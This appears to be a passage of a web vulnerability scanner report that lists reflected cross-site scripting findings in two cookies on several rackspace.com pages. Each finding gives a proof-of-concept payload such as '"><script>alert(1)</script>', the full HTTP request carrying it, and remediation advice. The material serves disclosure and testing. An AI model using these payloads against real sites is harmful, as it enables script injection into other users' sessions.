Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dcf545"><script>alert(1)</script>f7d4fbe9b3d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51a2b"%3balert(1)//fe7898ac58e was submitted in the IS_UASrackuid cookie. This input was echoed as 51a2b";alert(1)//fe7898ac58e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f851a2b"%3balert(1)//fe7898ac58e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d242"><script>alert(1)</script>1a3709cfedb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87d242"><script>alert(1)</script>1a3709cfedb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1e2"%3balert(1)//0356efb5555 was submitted in the chatslider cookie. This input was echoed as 3f1e2";alert(1)//0356efb5555 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3f1e2"%3balert(1)//0356efb5555; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>988ca7aaa5a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D7253d"><script>alert(1)</script>988ca7aaa5a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9811e"%3balert(1)//af4e59f1f5c was submitted in the IS_UASrackuid cookie. This input was echoed as 9811e";alert(1)//af4e59f1f5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/rackgivesback.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89811e"%3balert(1)//af4e59f1f5c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37424"><script>alert(1)</script>14d4878a5bf was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/rackgivesback.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f837424"><script>alert(1)</script>14d4878a5bf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b8"%3balert(1)//22b50dc06d4 was submitted in the chatslider cookie. This input was echoed as 290b8";alert(1)//22b50dc06d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/rackgivesback.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D290b8"%3balert(1)//22b50dc06d4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c091f"><script>alert(1)</script>c56cc7604ab was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/rackgivesback.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc091f"><script>alert(1)</script>c56cc7604ab; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd3e"><script>alert(1)</script>1f0d5c42fc2 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/hosting101/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87bd3e"><script>alert(1)</script>1f0d5c42fc2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b5d5"%3balert(1)//d07a48b879e was submitted in the IS_UASrackuid cookie. This input was echoed as 8b5d5";alert(1)//d07a48b879e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/hosting101/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88b5d5"%3balert(1)//d07a48b879e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9e8"%3balert(1)//40912b17317 was submitted in the chatslider cookie. This input was echoed as 5f9e8";alert(1)//40912b17317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/hosting101/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D5f9e8"%3balert(1)//40912b17317; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593d9"><script>alert(1)</script>c65e422337d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/hosting101/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D593d9"><script>alert(1)</script>c65e422337d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd0c3"><script>alert(1)</script>65d19321712 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dd0c3"><script>alert(1)</script>65d19321712; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; 